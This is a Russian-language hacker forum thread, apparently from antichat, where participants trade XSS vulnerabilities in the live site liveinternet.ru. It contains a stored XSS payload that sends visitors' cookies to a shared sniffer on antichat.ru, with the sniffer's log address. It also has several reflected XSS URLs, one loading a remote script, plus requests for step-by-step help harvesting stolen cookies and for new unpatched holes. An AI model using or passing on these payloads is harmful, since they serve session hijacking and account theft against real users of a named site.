Вот нашол активную xss:
когда регимся, вводим в поле "О новом дневнике - в двух словах" <script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>.
потом все кто помотрит ваш профиль отдаст куки...
Примеры:
http://www.liveinternet.ru/users/hello2all/profile/ - тут отдадите куки
http://www.liveinternet.ru/users/nokia1/profile/ - алерт.

О! санкс! всё пашет!

да..+ тебе )))
хотя уже пол года назад знал.....там ваще админы тупят...

http://www.liveinternet.ru/journal_register.php
Поле:*Подтвердить пароль:
не фильтруется!

)) прикольно,лови +

Туплю, не нашел этот пункт :(
Именно где он? Я по новой не регился, я именно хотел бы узнать где он в настройках, + у других в пофиле такого тоже не увидел, Черт не дружу я с таких типов сайтами :(

именно поэтому ты и не нашёл этот пунктик.
Надо региться заного, тогда найдёшь.

Пишите Xss вирус =) Мой для ливжурнала помог пользователям получить красивые доменчики третего уровня для своих ЖЖ =)

http://market.liveinternet.ru/index.php?id=10091&page=1&vendor=0&sort=2&sortorder=1&pricelo=10%22%3E%3Cscript%3Ealert()%3C/script%3E0

Пассивная ХSS почти там же!

PASSIVE XSS при реге счетчиков
http://www.liveinternet.ru/add/add/?rules=agreed&www=&type=site&random=1113854391&url=http%3A%2F%2Flalala.2u2r%2F&aliases=&name="><script src=http://ТВОЙСАЙТ.ru/js.js></script>&email=123%40123.123&password=mikmik&check=mikmik&keywords=&private=&subscribe=on&group=ru&group=ru%2Fauto&ok=+%E4%E0%EB%FC%F8%E5+%3E%3E+

Не совсем понял за что "-", но больше вопросов подобного плана задавать не буду. Единственно хотелось бы узнать, что я нарушил.

во-первых посмотри название темы, то что ты написал не относится сюда.Есть вопрос, ищи, если такая тема есть, прочти, если нету, создай в соответствующем разделе и спроси.Разе непонятно почему "-"?Тоже самое относится и другому товарищу.Еще вопросы?С вами был m0nzt3r :)

если не ошибаюсь пасивный xxs это тот каторый уже прикрыли, так зачем выкладывать его
если не прав объясните что значит пасивный.

пассивная, это когда жертва должна зайти по ссылке, которую ты дашь, чтоб хсс подействовала.Понятно?Мало флейми, устал посты стирать твои.. (m0nzt3r)

ребят, а дырку, по ходу, уже прикрыли. мне почему-то кажется, что тут нетрудно будет другую найти, тут просто <script> фильтруется. *вышесказанное было написано без моска, ибо я в этом деле не очень разбираюсь =)*.
может кто-нибудь башковитый и рукастый сможет сообразить в чем тут дело? помогите, пожалуйста.

http://market.liveinternet.ru/index.php?id=10091&page=1&vendor=0&sort=2&sortorder=1&pricelo=10%22%3E%3Cscript%3Ealert()%3C/script%3E0

Пассивная ХSS почти там же!
Это другой серв....

2 re-arranged

http://www.liveinternet.ru/member2.php?action=addlist&userlist=buddy&userid=729772&userownid=undefined"><script>alert("xss")</script>

пассивная

Вот нашол активную xss:
когда регимся, вводим в поле "О новом дневнике - в двух словах" <script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>.
потом все кто помотрит ваш профиль отдаст куки...
Примеры:
http://www.liveinternet.ru/users/hello2all/profile/ - тут отдадите куки
http://www.liveinternet.ru/users/nokia1/profile/ - алерт.


А что дальше делать?

Куки отправляются на снифф общий? если да, то я не могу найти его лог =/

Зы: или это уже вообще не катит?


ребят, а дырку, по ходу, уже прикрыли. мне почему-то кажется, что тут нетрудно будет другую найти, тут просто <script> фильтруется. *вышесказанное было написано без моска, ибо я в этом деле не очень разбираюсь =)*.
может кто-нибудь башковитый и рукастый сможет сообразить в чем тут дело? помогите, пожалуйста.
+1 =)

Не прикрыли ничего, http://www.liveinternet.ru/users/nokia1/profile/ алерт есть..
2DeadFire лог теперь на old.antichat.ru
<script>img = new Image(); img.src = "http://old.antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>
Log: http://old.antichat.ru/sniff/log.php

Объясните плз для тупых что нужно сделать по шагам.

Зы: там скрипты отсеиваются

Зыы: я создал юзера (Vasssssia (http://www.liveinternet.ru/users/vasssssia/profile/)) в поле краткая инфа запихал скрипт, ну собсно и в основную тоже, на сниф вообще ниче не приходит..
приходит, когда просто в дневник пихаешь "картинку", только толку от этого как от быка молока...

Зыыы: за лог спасибо

2InferNo23 тысяча чертей, отсеиваются <script> </script>.

я не любитель создавать темы изза небольших вопросов, поэтому спрошу тут. В куках лиру хранится чистый мд5 или соль?

по теме: уязвимость еще существует?

короче так, для теста зарегал акк. Зашел под ним, посмотрел в куках bbpassword имеет значение 1008cac831727c728c87294fe37fd18c что не соответствует мд5хэшу введеного пароля 233223 ; значит другой алгоритм шифрования?

LeopardSS, врятли, скорее всего это временный "пароль", присвоенный сессии, до её истечения, т.е. пока ты не нажмешь "выйти".

Там соль добавляется(((

Пассивный...
http://www.liveinternet.ru/showjournal.php?action=draft&journalid="><script>alert(123)</script>

никто не подскажет где xss искать на ли.ру? старые дыры админы залатали, а новых я найти не сумел -не на столько про...
если не жалко поделиться, то пишите в личку (обещаю использовать разумно и не сливыть в паблик ни на ачате ни в других местах).
заранее благодарю

никто не подскажет где xss искать на ли.ру? старые дыры админы залатали, а новых я найти не сумел -не на столько про...
если не жалко поделиться, то пишите в личку (обещаю использовать разумно и не сливыть в паблик ни на ачате ни в других местах).
заранее благодарю

археолог :confused:

сам знаю - старую тему поднял. но вместо того чтобы шутить посоветовал бы что-нибудь

никто не подскажет где xss искать на ли.ру? старые дыры админы залатали, а новых я найти не сумел -не на столько про...
если не жалко поделиться, то пишите в личку (обещаю использовать разумно и не сливыть в паблик ни на ачате ни в других местах).
заранее благодарю
В полях и запросах ^_^